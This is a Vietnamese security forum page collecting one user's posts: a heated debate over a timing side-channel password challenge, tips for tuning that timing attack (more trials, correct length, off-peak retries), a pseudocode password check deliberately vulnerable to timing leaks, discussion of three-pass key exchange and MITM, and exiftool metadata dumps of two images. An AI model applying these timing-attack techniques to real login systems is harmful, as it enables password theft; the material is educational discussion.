banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: WinDak  XML
Profile for WinDak Messages posted by WinDak [ number of posts not being displayed on this page: 3 ]
 
Sao phải cài bạn gcc-3.0.1 ? nachos có yêu cầu cái đó không ?

nếu không bạn thử xài apt-get install thay vì make để cài gcc

Code:
sudo apt-get install gcc build-essential

jcisio wrote:

WinDak wrote:

Hì nếu thế thì mình hơi thất vọng tí và mình nghĩ để exploit bằng code mà bạn đã post lên thì bạn phải thêm 3 điều sau:
1) Tăng số lần thử lên, thay vì 3 lần thành 10 lần hay 100 lần để tăng độ chính xác và may mắn, vì 3ms thì chỉ cần 1 vài cái context switching được round up (không biết bạn crazy boy viết cái timing như thế nào) cũng đã sai kết quả
2) Length password của bạn phải = original password length = 8
3) Chờ ban đêm thử, nếu vài lần mà không đúng thì nên thử lại sau vài tiếng

Và mình vẫn giữ nguyên quan điểm là không có cái timing của bạn crazyboy thì không thể tấn công cái này remotely.
Thân,
wd.
 


Đoạn trên sai nhiều lắm, bồ sửa lại đi, ngay cả code của cái checkpass.py đã post rồi mà chắc bồ chưa có thời gian đọc mà còn thắc mắc "không biết bạn crazy boy viết cái timing như thế nào"?

Chi phí tấn công đợt này của tôi khoảng trên dưới 100 USD (dựa vào thời gian bỏ ra), còn bỏ cái timing thì bài toán trở nên khó hơn khoảng vài chục nghìn lần, chi phí 100 USD thì không giải nổi rồi. Cái "quan điểm" của bồ cao quá, tôi là cóc ké không dám bàn, không dám phán "không thể" hay "có thể".

Tóm lại, dường như mấy Elite Member ở chủ đề này khá cay cú, mất bình tĩnh nên đang nói lung tung. Nhìn 3 cái điều bạn tưởng tượng thì giống như bồ đang cúi xuống nhìn, thảo nào chẳng nhìn thấy ai! Ngay cả ms với us bồ còn chưa phân biệt được nữa là.

@crazy: bác không nói gì về cái đáp án, cho mọi người đỡ thắc mắc, rồi đóng cái chủ đề này được rồi. Vì những ai có khả năng họ lại không tham gia vào đây! 


Tôi nói tôi không biết vì quả thực tôi chưa đọc cái code, tôi chỉ lấy cái link và test chay + đọc các bài khác thôi, tôi không biết thì nói không biết tôi nói sai chỗ nào nhỉ smilie đoạn us chẳng qua là trích từ lý luận của bạn để nói tiếp bạn không thấy à, ms thì chỉ là tôi ghi nhầm thôi. Mà thôi mình xin rút quân, cãi nhau với bạn thật là mệt mỏi, nếu bạn muốn chứng minh tôi sai thì nên đưa ra thêm dẫn chứng chứ cứ nói kiểu ngã ngửa "quan điểm của bồ cao quá" thì tôi cũng không hiểu bạn muốn nói gì nữa :-].
Thân chào smilie

jcisio wrote:
Solution tôi đưa vài hôm trước rồi. Nhưng chờ code để ăn sẵn thì không có đâu! Trừ khi có vài người code thử trước. Còn crazyboy thì tôi không biết là ai (xin lỗi), nên tôi không biết là sẽ có solution không. 


Hì nếu thế thì mình hơi thất vọng tí và mình nghĩ để exploit bằng code mà bạn đã post lên thì bạn phải thêm 3 điều sau:
1) Tăng số lần thử lên, thay vì 3 lần thành 10 lần hay 100 lần để tăng độ chính xác và may mắn, vì 3ms thì chỉ cần 1 vài cái context switching được round up (không biết bạn crazy boy viết cái timing như thế nào) cũng đã sai kết quả
2) Length password của bạn phải = original password length = 8
3) Chờ ban đêm thử, nếu vài lần mà không đúng thì nên thử lại sau vài tiếng

Và mình vẫn giữ nguyên quan điểm là không có cái timing của bạn crazyboy thì không thể tấn công cái này remotely.
Thân,
wd.

jcisio wrote:
Giờ hiểu rồi. Tóm lại là bồ chưa làm. Và bồ cho rằng thống kê nó không thực tế. Vậy thôi tôi chấm dứt.

Cái mod hay min là nói đùa thôi, bồ hiểu thì hiểu, không thì thôi, đừng để tâm, không nghiêm trọng đâu! 


Dĩ nhiên là tôi không chấp 1 người đang mất bình tĩnh. Hi vọng là bạn đã calm down và chúng ta sẽ có thể thảo luận theo tiếp chuyện "thực tế" hay "không thực tế". Tôi sẽ chờ solution của bạn hoặc là solution của crazyboy rồi sẽ bàn tiếp.

Chẳng biết ai coi thường ai. Nhưng ở chủ đề này nhiều bác chỉ bàn hưu tán vượn, chỉ kêu "khó lắm, không làm được" (dù người khác đã làm được rồi), mà chẳng chịu thảo luận cách giải quyết vấn đề. Thậm chí tôi có gợi ý đem cái checkpass.py về localhost để thử trong điều kiện tốt nhất mà chẳng ai trả lời (chắc là nhiều người làm rồi, nhưng ngay cả khi crack ở localhost cũng không thành công, nên không lên tiếng). Mấy bồ ở HVA bao lâu rồi, cứ như vậy thì quanh quẩn ở Elite thôi, không lên mod được đâu (nói theo kiểu AQ ở trên thì: mặc dù tôi là mem, nhưng tôi chỉ phục Admin thôi, chứ không coi ê lít, mod ra gì).
 


Còn nữa, chuyện lên mod được hay không cũng không liên quan gì ở đây, tôi tôn trọng và kính phục mod và admin họ bỏ thời gian lo cho anh em trên forum này nhưng không có nghĩa là những người đó có khả năng hơn tôi trong tất cả mọi thứ (mỗi người có 1 vài tuyệt chiêu là vậy) và không có nghỉa là tôi không đủ khả năng làm mod. Tôi nghĩ nhiều anh em elite khác cũng vậy.

Cách bạn nói lại càng tỏ ra thiếu tôn trọng người khác. Tôi nghĩ bạn đang bực mình, nên calm down và nhìn lại một chút


Tôi góp ý:
- Bồ không làm được A
- Bồ xem như A bất khả thi, do đó không làm được A là hiển nhiên (dù người khác làm được A)
- Bồ tuyên bố chỉ phục ai làm được A' (khó hơn A không dưới 10000 lần) smilie
- Bồ không biết tôi làm sao để làm được A, nhưng vẫn coi thường nó. Cái code của tôi đang dùng so với cái tôi gửi lên hôm trước khác xa lắm, tôi đã nói là nó sai nhiều chỗ, và tôi cũng đã phải sửa lại thuật toán (sửa nhiều lần, vì thống kê cũng có 5-7 đường thống kê, giảm nhiễu cũng có 5-7 đường giảm nhiễu).
- Bồ chẳng hiểu gì về thống kê (stats) mà nói cứ như đúng rồi
 


Cái này la do bồ ngộ nhận
1) Tôi chưa nói là tôi không làm được A hay tôi làm được A. Tôi chỉ không muốn tốn thời gian vào một việc mà nó không có tính thuyết phục trong thực tế
2) Tôi cũng không nói bất cứ thứ gì là bất khả thi
3) Tôi không coi thường code của bạn cũng như cách bạn làm A hay B gì đó vì bạn chưa post lên bao giờ. Chính bạn là người nói "nên mở mắt ra" và "có mấy ai làm được" và tôi chỉ nhắc lại những điều đó vì tôi cho là đó là không tôn trọng người khác
4) Nếu bạn xem lại thì tôi chỉ nói đến những cái mà bạn đã post rồi đó là cách tính 30% hay gì đó, thì tôi gọi là stat. Và theo tôi nó không thực tế.
5) Những thứ sử dụng số liệu như vậy thì tôi gọi chung là stat, hay statistic.


Cũng thật ngẫu nhiên là 2-3 hôm trước tôi cũng gặp bồ WinDak một lần, lúc đó tên là WinDak@HVA và giới thiệu khá hoành tráng (xin lỗi, nếu anh bạn WinDak@HVA đó là người khác).
 

Bạn lôi chuyện này ra ở đây tôi không thấy có bất cứ thứ gì liên quan. Tôi là tôi bạn muốn tôn trọng tôi hay không là quyền của bạn nhưng đừng có ngộ nhận bất cứ chuyện gì

jcisio wrote:

- Ở trang trước H3x4 có gợi ý, và mình cũng nói mấy lần rồi về cách làm. Nếu không mở mắt, nhìn kĩ, mà cứ đi vào lối mòn thì không làm được đâu.
 


Hài.. chính bạn là người không mở mắt ra để nhìn xem cái exploit của bạn có thể áp dụng thực tế được hay không. Cách sử dụng thêm stat để tính mà bạn nói có gì mà mới, đó là những thứ căn bản nhất thôi tôi nghĩ chẳng có ai ở đây khi test là không biết cái cách ấy, cứ chạy cho nhiều vào rồi may mắn 1 lúc nào đó máy nó rảnh ra thì đúng... thử đưa ra một cái exploit mà chạy 1 phát là 100% ra kết quả đi bạn và đừng nghĩ là mình làm ra được cái pass với cái script kia thì có thể nói là "mấy người ở đây làm ra", đâu cần thiết phải coi thường người khác như vậy.
smilie Việc giải mã là khả thi nếu như cái CPU chạy ổn định và phải có một chút may mắn là lúc đó không có ai cùng đang connect vào và test cái exploit. Nghe thật là lame. smilie

Cái code của crazyboy chỉ để nghịch thôi chứ thực thế không thể làm được, bạn nào tìm ra pass mà không cần sử dụng cái đoạn in ra thời gian xử lý thì mình mới phục là tài
Trên thực tế, theo mình nếu muốn bảo đảm thông tin trao đổi 1 cách an toàn thì tốt nhất sử dụng các protocol đã được implement sẵn, vd thay vì http -> https. chứ không nên "re-invent the wheel" dễ dẫn đến các sai lầm như pass-the-hash

StarGhost wrote:

Bạn thêm identity bằng cách nào để "không bị trường hợp này"?
 


Đưa ra cái ý tưởng để mọi người phát triển thêm thôi, chứ mình solo tiếp thì hơi mất tính thú vị của thảo luận.

Bà con có thể thảo luận thêm cách chống MITM / impersonation trong trường hợp mà mình đã đưa ra, nếu mà topic chìm quá thì mình sẽ solo tiếp


SCA ám chỉ các kỹ thuật crack hệ thống mã hoá. S-E có tính "social" hơn là kỹ thuật.

StarGhost wrote:
@WinDak: bất cứ một kết nối nào (sử dụng bất cứ một loại cryptographic protocol nào) không có secure authentication của ít nhất một end-point thì đều có thể bị MITM hoặc/và impersonation attack. Vì vậy, đối với mô hình trong topic, đòi hỏi về security không nên quá tham vọng, mà chỉ nên dừng lại ở 2 mục tiêu quan trọng: i) không lưu password dưới dạng plaintext và ii) không truyền password dưới dạng plaintext để chống sniffing.

Ngoài ra, bạn WinDak thử mô tả xem tấn công MITM diễn ra như thế nào. Riêng mình thì mình không nghĩ là có thể tấn công MITM, tuy nhiên impersonation thì được.  


Đúng như StarGhost nói, nếu chỉ có nhiêu đó thôi mà không có các hình thức authenticate thì chắc chắn sẽ vulnerable.

Vì cái protocol đưa ra này chưa hoàn chỉnh nên đưa ra phương pháp tấn công cũng chưa thật logic, đại khái mình nêu ý tưởng sẽ như thế này :

A contact đến B sau khi authenticate đến bước trao đổi khoá, C ở giữa và thay vì gửi hòm đến B thì C khoá bằng khoá của C và giả làm B. C có thể không contact luôn đến B, hoặc giả làm A contact đến B. Như vậy sau 2 quá trình trao đổi khoá trong hòm, C có khoá A<->C và C<->B, C có thể thoải mái forward message từ A đến B như thật, trong khi 2 người này hoàn toàn không biết có người ở giữa. Không biết cái này là impersonation hay là MITM ? xin StarGhost cho mở mang tầm mắt.

Trên thực tế thì có thể thêm identity của A và B ở trong hòm thì sẽ không bị trường hợp này, nhưng có bị các kiểu attack khác không thì phải đưa full protocol ra mới xem xét được.

wd.

StarGhost wrote:
@radiohead: quá chuẩn.

Mình biết có một ý tưởng như sau: làm một cái hòm có 2 ổ khoá, user sau khi cho password vào hòm sẽ khoá lại bằng ổ của mình, sau đó gửi đến server. Server sau đó khoá cái ổ còn lại và gửi về user. User mở khoá của mình và gửi hòm lại server. Server mở khoá hòm và lấy password, sau đó hash nó và so sánh với giá trị hash trong database.

Để hiện thực hoá cần hai one-to-one mappings f và g (tượng trưng cho 2 ổ khoá) với commutative composition. Ví dụ lý tưởng là commutative encryption. Mình thấy cũng thú vị nếu các bạn thảo luận về những vấn đề liên quan đến giải pháp này.  


Ý tưởng này của StarGhost hình như có 1 bài hỏi trước kia rồi. Đây là lý thuyết của Three-pass protocol. Nôm na là cần cái E để E(k1,E(k2,x)) = E(k2,E(k1(x)). Kiếm được cái E thế này, mà lại an toàn thì coi bộ cũng căng, một cái có ý tưởng cùng với Diffie-Hellman

E(e,M) = M^e (mod p) & D(d,M) = M^d (mod p) e.d = 1 (mod p-1)
vậy thì E(k1,E(k2,x)) = M^k1^k2 = M^k2^k1 (mod p) = E(k2,E(k1,M))

Vì chỉ biết E = M^x (mod p) thì khó tìm được M mà không có thông tin về x nên hàm mã hoá này an toàn.

Nhưng phương pháp 3-pass này dễ dàng bị tấn công bởi MITM




Lý thuyết là thế thôi, chứ thực tế theo mình attack được là cả một vấn đề. Trừ phi có sự khác biệt thực sự 1s vs 100s chứ không thì các yếu tố gây nhiễu dễ dàng làm sai lệch tính toán. Ví dụ như gamma vừa nói bench trên local server dễ hơn rất nhiều so với remote

Ngay cả Crack RSA-1024 bằng side-channel attack cũng phải chui vào cái server room mà làm thì mới được smilie

http://tech.icrontic.com/articles/1024-bit-rsa-not-cracked-as-engadget-claims/
Bạn thử tìm hiểu cách khai thác đoãn mã mà mình post thì sẽ hiểu. Thử viết một đoạn chương trình để exploit xem sao


me: Có nghĩa là attacker tấn công vào phần "xác nhận" hoặc có thể hiểu là giai đoạn "khớp" thông tin đúng không bạn.?
 


Attacker có thể tấn công vào bất cứ phần nào mà attacker nắm được yếu điểm trong design. Attack này đòi hỏi phải biết rõ về hệ thống ( vd open source ) thì mới thực hiện được.
Cách exploit thế nào, tận dụng ra sao thì tùy trường hợp cụ thể. Nên đọc thêm wiki hoặc google chứ đừng phán đoán mà không có cơ sở

truyennxt wrote:
Trong mấy ngày qua mình có đọc về cái kiểu tấn công này. Trong bài đọc mình thấy sơ qua ý chính của kiểu tấn công này là lợi dụng "độ trễ" (latency). Vậy "độ trễ" là gì mà attacker lại tấn công nó mà lấy đi USD ở thị trường chứng khoán. Mình có ý định lên hỏi "độ trễ" là gì, nhưng nghĩ ngẫm "nên tìm hiểu trước khi hỏi". Nên mình ngồi mạng search về cái khái niệm khó hiểu này.

Khái niệm độ trễ biểu thị quãng thời gian bạn phải chờ trước khi nhận được thứ mình cần. Theo từ điển Merriam-Webster thì latency có nghĩa là 'khoảng thời gian từ khi ra lệnh đến khi nhận được sự phản hồi' 


Mình chỉ biết là như vậy, và "theo mình nghĩ" thì khi một lệnh A được gửi đi rồi "chờ" phản hồi lại thì attacker sẽ lợi dụng thời điểm đó để có thể "can thiệp" rồi gửi phản hồi "giả". Cộng thêm có thể "chặn" phản hồi "thật".

Vậy về phượng diện "sâu" hơn của "kỹ thuật" thì attacker làm thế nào để "lợi dụng" độ trễ này? 


Hiểu sai rồi, side-channel attack dựa vào các thông tin phản hồi trong xử lý thông tin ví dụ như thời gian để dự đoán các tiến trình xử lý của ứng dụng.

Một ví dụ như thế này:
input là string password nhập vào để kiểm tra

Code:
input = args;
for (k=0;k<input.length();k++) {
if (input[k]!=password[k])
exit("wrong password")
else {
for (i=0;i<1000000;i++) { do_something() }
}
}


Đoạn mã trên có thể bị lỗi Side-Channel-Attack, và attacker có thể lợi dụng để tìm ra password. Thử tìm hiểu tại sao xem nhỉ ?>
Sao không tìm hiểu xem khi nào thì "chown" với "cat" thực hiện được cái đã rồi tính chuyện disable

Vì nếu không hiểu rõ thì disable 1 cái thì lại lòi cái khác thôi
Theo mình không thể set như bạn được nếu chỉ sử dụng umask, 644 ở file <=> 755 folder
Đọc thêm
http://ubuntuforums.org/showthread.php?t=1491819
http://superuser.com/questions/199724/doubt-in-umask-unix-command-line

StarGhost wrote:
@WinDak: IPTC digest không phải là thông tin ở trong file, mà nó được tính toán bởi exiftool và show ra cho bạn. Trong trường hợp này có nghĩa là bạn đã chạy exiftool để xem thông tin về 2 file ảnh đó trên 2 máy khác nhau, và một trong 2 máy đó không có Digest::MD5 module trong Perl, vì vậy nó cho ra toàn zeros. Còn nếu như IPTC không theo standard location thì nó sẽ thông báo "Ignored non-standard IPTC at $path". Chi tiết xem trong [ExtractPath]/Image-ExifTool-8.43/lib/Image/ExifTool/IPTC.pm:1007-1032
 


Thế thì lạ thật đấy, mình chạy exiftool trên cùng 1 máy chứ không phải 2 máy khác nhau

StarGhost wrote:

Mấy cái trong document ancestors là lấy từ Document ID mà ra, thế nên nếu giống nhau thì tức là 2 ảnh này xuất phát từ cùng một bức ảnh. Tuy nhiên điều này không có nghĩa là 2 ảnh này được sửa trên cùng một máy. Dù vậy, 2 ảnh này cùng sử dụng sRGB, và không phải là mặc định Adobe RGB của CS5, thế nên nhiều khả năng là sửa bởi cùng một người.
 


Đồng ý với nhận xét của bác, có một số thông tin không mặc định có vẻ giống nhau.
Có điều có 1 field như thế này :

File 1:
Code:
IPTC Digest : 48c0eccd3393aa062cb33dc6a0892a24


Trong khi file thứ 2:
Code:
IPTC Digest : 00000000000000000000000000000000


Xem document của nó thì:

MD5 digest of existing IPTC data. All zeros if IPTC exists but Digest::MD5 is not installed. Only calculated for IPTC in the standard location as specified by the MWG
 


Như vậy có thể confirm là 2 bức ảnh này được sửa từ 2 máy khác nhau nhưng cùng 1 nguồn được không nhỉ ?

Thử chuyển sang chế độ passive rồi mở thêm các port trong range của passive mode
Down cái này về chạy thử, rồi post cái log lên đây xem
http://free.antivirus.com/hijackthis/
Mình có 2 cái pictures, đang muốn kiểm chứng nếu 2 cái pic này có từ một cái computer hoặc người tạo ra có liên hệ gì với nhau hay không. Sử dụng exiftool thì ra những thông tin ở dưới

Lệnh sử dụng là : exiftool -a -H

Dễ thấy cả 2 đều được edit bằng photoshop CS5 cùng build date và save với JPG max quality (không phải default)
Ngoài ra chỉ thấy 1 điểm đáng ngờ là Document Ancestor giống nhau, nhưng mình không chắc có thể kết luận được gì hay không ?

Theo Adobe:

Document Ancestors: If the source document for a copy-and-paste or place operation has a document ID, that ID is added to this list in the destination document's XMP.
 


Có ai đã có kinh nghiệm và hiểu biết về photoshop thì xin giúp 1 tay smilie.

wd.

file 1 jpg
Code:
- ExifTool Version Number : 7.89
- File Name : 1.jpg
- Directory : .
- File Size : 865 kB
- File Modification Date/Time : 2011:01:11 09:56:09+08:00
- File Type : JPEG
- MIME Type : image/jpeg
- Exif Byte Order : Big-endian (Motorola, MM)
0x0112 Orientation : Horizontal (normal)
0x011a X Resolution : 72
0x011b Y Resolution : 72
0x0128 Resolution Unit : inches
0x0131 Software : Adobe Photoshop CS5 Windows
0x0132 Modify Date : 2011:01:05 21:53:16
0xa001 Color Space : sRGB
0xa002 Exif Image Width : 1920
0xa003 Exif Image Height : 1080
0x0103 Compression : JPEG (old-style)
0x011a X Resolution : 72
0x011b Y Resolution : 72
0x0128 Resolution Unit : inches
0x0201 Thumbnail Offset : 314
0x0202 Thumbnail Length : 4045
- Current IPTC Digest : 48c0eccd3393aa062cb33dc6a0892a24
0x005a Coded Character Set : UTF8
0x005a Coded Character Set : UTF8
0x005a Coded Character Set : UTF8
0x005a Coded Character Set : UTF8
0x0000 Application Record Version : 5248
0x0425 IPTC Digest : 48c0eccd3393aa062cb33dc6a0892a24
0x0000 X Resolution : 72
0x0002 Displayed Units X : inches
0x0004 Y Resolution : 72
0x0006 Displayed Units Y : inches
0x040d Global Angle : 120
0x0419 Global Altitude : 30
0x040c Photoshop Thumbnail : (Binary data 4045 bytes, use -b option to extract)
0x0000 Photoshop Quality : 12
0x0001 Photoshop Format : Optimised
0x0002 Progressive Scans : 3 Scans
- XMP Toolkit : Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
- Creator Tool : Adobe Photoshop CS5 Windows
- Create Date : 2010:12:15 05:23:07+08:00
- Metadata Date : 2011:01:05 21:53:16+08:00
- Modify Date : 2011:01:05 21:53:16+08:00
- Format : image/jpeg
- Instance ID : xmp.iid:3DE62A25D318E011B0978CE4AED2FD83
- Document ID : xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB
- Original Document ID : xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB
- Color Mode : 3
- ICC Profile Name : sRGB IEC61966-2.1
- History Action : created, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, saved, converted, derived, saved
- History Instance ID : xmp.iid:A4E76358C807E011AAC8DDFA3BDC34DB, xmp.iid:E0395298C807E011BA5EEC7138773A3D, xmp.iid:E1395298C807E011BA5EEC7138773A3D, xmp.iid:E2395298C807E011BA5EEC7138773A3D, xmp.iid:E4395298C807E011BA5EEC7138773A3D, xmp.iid:E5395298C807E011BA5EEC7138773A3D, xmp.iid:E6395298C807E011BA5EEC7138773A3D, xmp.iid:E8395298C807E011BA5EEC7138773A3D, xmp.iid:E9395298C807E011BA5EEC7138773A3D, xmp.iid:99BC5CC1D007E011BA5EEC7138773A3D, xmp.iid:9ABC5CC1D007E011BA5EEC7138773A3D, xmp.iid:9BBC5CC1D007E011BA5EEC7138773A3D, xmp.iid:148EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:158EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:168EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:178EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:188EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:198EBDCF1118E011ADA3AE7E8AFCD8E1, xmp.iid:FE68A35E1B18E011ACD2BC25B9520213, xmp.iid:3CE62A25D318E011B0978CE4AED2FD83, xmp.iid:3DE62A25D318E011B0978CE4AED2FD83
- History When : 2010:12:15 05:23:07+08:00, 2010:12:15 05:24:55+08:00, 2010:12:15 05:24:55+08:00, 2010:12:15 05:31:09+08:00, 2010:12:15 05:37:54+08:00, 2010:12:15 05:38:17+08:00, 2010:12:15 05:38:17+08:00, 2010:12:15 05:45:37+08:00, 2010:12:15 06:02:20+08:00, 2010:12:15 06:23:19+08:00, 2010:12:15 06:49:03+08:00, 2010:12:15 06:49:22+08:00, 2011:01:04 22:52:34+08:00, 2011:01:04 22:53:46+08:00, 2011:01:04 23:06:21+08:00, 2011:01:04 23:21:10+08:00, 2011:01:04 23:23:10+08:00, 2011:01:04 23:30:20+08:00, 2011:01:04 23:57:45+08:00, 2011:01:05 21:53:16+08:00, 2011:01:05 21:53:16+08:00
- History Software Agent : Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows
- History Changed : /, /, /, /, /, /, /, /, /, /, /, /, /, /, /, /, /, /, /, /
- History Parameters : from application/vnd.adobe.photoshop to image/jpeg, converted from application/vnd.adobe.photoshop to image/jpeg
- Derived From Instance ID : xmp.iid:3CE62A25D318E011B0978CE4AED2FD83
- Derived From Document ID : xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB
- Derived From Original Document ID: xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB
- Document Ancestors : xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB, xmp.did:BA065711C201E0119AACC454F83627E4
0x0004 Profile CMM Type : Lino
0x0008 Profile Version : 2.1.0
0x000c Profile Class : Display Device Profile
0x0010 Color Space Data : RGB
0x0014 Profile Connection Space : XYZ
0x0018 Profile Date Time : 1998:02:09 06:49:00
0x0024 Profile File Signature : acsp
0x0028 Primary Platform : Microsoft Corporation
0x002c CMM Flags : Not Embedded, Independent
0x0030 Device Manufacturer : IEC
0x0034 Device Model : sRGB
0x0038 Device Attributes : Reflective, Glossy, Positive, Color
0x0040 Rendering Intent : Media-Relative Colorimetric
0x0044 Connection Space Illuminant : 0.9642 1 0.82491
0x0050 Profile Creator : HP
0x0054 Profile ID : 0
- Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
- Profile Description : sRGB IEC61966-2.1
- Media White Point : 0.95045 1 1.08905
- Media Black Point : 0 0 0
- Red Matrix Column : 0.43607 0.22249 0.01392
- Green Matrix Column : 0.38515 0.71687 0.09708
- Blue Matrix Column : 0.14307 0.06061 0.7141
- Device Mfg Desc : IEC http://www.iec.ch
- Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
- Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
0x0008 Viewing Cond Illuminant : 19.6445 20.3718 16.8089
0x0014 Viewing Cond Surround : 3.92889 4.07439 3.36179
0x0020 Viewing Cond Illuminant Type : D50
- Luminance : 76.03647 80 87.12462
0x0008 Measurement Observer : CIE 1931
0x000c Measurement Backing : 0 0 0
0x0018 Measurement Geometry : Unknown (0)
0x001c Measurement Flare : 0.999%
0x0020 Measurement Illuminant : D65
- Technology : Cathode Ray Tube Display
- Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
- Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
- Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
0x0000 DCT Encode Version : 100
0x0001 APP14 Flags 0 : [14]
0x0002 APP14 Flags 1 : (none)
0x0003 Color Transform : YCbCr
- Image Width : 1920
- Image Height : 1080
- Encoding Process : Baseline DCT, Huffman coding
- Bits Per Sample : 8
- Color Components : 3
- Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
- Image Size : 1920x1080
- Thumbnail Image : (Binary data 4045 bytes, use -b option to extract)


File 2 jpg
Code:
- ExifTool Version Number : 7.89
- File Name : 2.jpg
- Directory : .
- File Size : 554 kB
- File Modification Date/Time : 2011:01:11 09:56:17+08:00
- File Type : JPEG
- MIME Type : image/jpeg
- Exif Byte Order : Big-endian (Motorola, MM)
0x0112 Orientation : Horizontal (normal)
0x011a X Resolution : 72
0x011b Y Resolution : 72
0x0128 Resolution Unit : inches
0x0131 Software : Adobe Photoshop CS5 Windows
0x0132 Modify Date : 2011:01:02 23:51:08
0xa001 Color Space : sRGB
0xa002 Exif Image Width : 1920
0xa003 Exif Image Height : 1080
0x0103 Compression : JPEG (old-style)
0x011a X Resolution : 72
0x011b Y Resolution : 72
0x0128 Resolution Unit : inches
0x0201 Thumbnail Offset : 314
0x0202 Thumbnail Length : 2997
0x0425 IPTC Digest : 00000000000000000000000000000000
0x0000 X Resolution : 72
0x0002 Displayed Units X : inches
0x0004 Y Resolution : 72
0x0006 Displayed Units Y : inches
0x040d Global Angle : 120
0x0419 Global Altitude : 30
0x040c Photoshop Thumbnail : (Binary data 2997 bytes, use -b option to extract)
0x0000 Photoshop Quality : 12
0x0001 Photoshop Format : Optimised
0x0002 Progressive Scans : 3 Scans
- XMP Toolkit : Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
- Creator Tool : Adobe Photoshop CS5 Windows
- Create Date : 2011:01:02 23:36:39+08:00
- Metadata Date : 2011:01:02 23:51:08+08:00
- Modify Date : 2011:01:02 23:51:08+08:00
- Format : image/jpeg
- Instance ID : xmp.iid:B8743F178616E0118484E704BB19A78B
- Document ID : xmp.did:B5743F178616E0118484E704BB19A78B
- Original Document ID : xmp.did:B5743F178616E0118484E704BB19A78B
- Color Mode : 3
- ICC Profile Name : sRGB IEC61966-2.1
- History Action : created, saved, saved, converted, derived, saved
- History Instance ID : xmp.iid:B5743F178616E0118484E704BB19A78B, xmp.iid:B6743F178616E0118484E704BB19A78B, xmp.iid:B7743F178616E0118484E704BB19A78B, xmp.iid:B8743F178616E0118484E704BB19A78B
- History When : 2011:01:02 23:36:39+08:00, 2011:01:02 23:44:38+08:00, 2011:01:02 23:51:08+08:00, 2011:01:02 23:51:08+08:00
- History Software Agent : Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows, Adobe Photoshop CS5 Windows
- History Changed : /, /, /
- History Parameters : from application/vnd.adobe.photoshop to image/jpeg, converted from application/vnd.adobe.photoshop to image/jpeg
- Derived From Instance ID : xmp.iid:B7743F178616E0118484E704BB19A78B
- Derived From Document ID : xmp.did:B5743F178616E0118484E704BB19A78B
- Derived From Original Document ID: xmp.did:B5743F178616E0118484E704BB19A78B
- Document Ancestors : xmp.did:A4E76358C807E011AAC8DDFA3BDC34DB, xmp.did:BA065711C201E0119AACC454F83627E4
0x0004 Profile CMM Type : Lino
0x0008 Profile Version : 2.1.0
0x000c Profile Class : Display Device Profile
0x0010 Color Space Data : RGB
0x0014 Profile Connection Space : XYZ
0x0018 Profile Date Time : 1998:02:09 06:49:00
0x0024 Profile File Signature : acsp
0x0028 Primary Platform : Microsoft Corporation
0x002c CMM Flags : Not Embedded, Independent
0x0030 Device Manufacturer : IEC
0x0034 Device Model : sRGB
0x0038 Device Attributes : Reflective, Glossy, Positive, Color
0x0040 Rendering Intent : Media-Relative Colorimetric
0x0044 Connection Space Illuminant : 0.9642 1 0.82491
0x0050 Profile Creator : HP
0x0054 Profile ID : 0
- Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
- Profile Description : sRGB IEC61966-2.1
- Media White Point : 0.95045 1 1.08905
- Media Black Point : 0 0 0
- Red Matrix Column : 0.43607 0.22249 0.01392
- Green Matrix Column : 0.38515 0.71687 0.09708
- Blue Matrix Column : 0.14307 0.06061 0.7141
- Device Mfg Desc : IEC http://www.iec.ch
- Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
- Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
0x0008 Viewing Cond Illuminant : 19.6445 20.3718 16.8089
0x0014 Viewing Cond Surround : 3.92889 4.07439 3.36179
0x0020 Viewing Cond Illuminant Type : D50
- Luminance : 76.03647 80 87.12462
0x0008 Measurement Observer : CIE 1931
0x000c Measurement Backing : 0 0 0
0x0018 Measurement Geometry : Unknown (0)
0x001c Measurement Flare : 0.999%
0x0020 Measurement Illuminant : D65
- Technology : Cathode Ray Tube Display
- Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
- Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
- Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
0x0000 DCT Encode Version : 100
0x0001 APP14 Flags 0 : [14]
0x0002 APP14 Flags 1 : (none)
0x0003 Color Transform : YCbCr
- Image Width : 1920
- Image Height : 1080
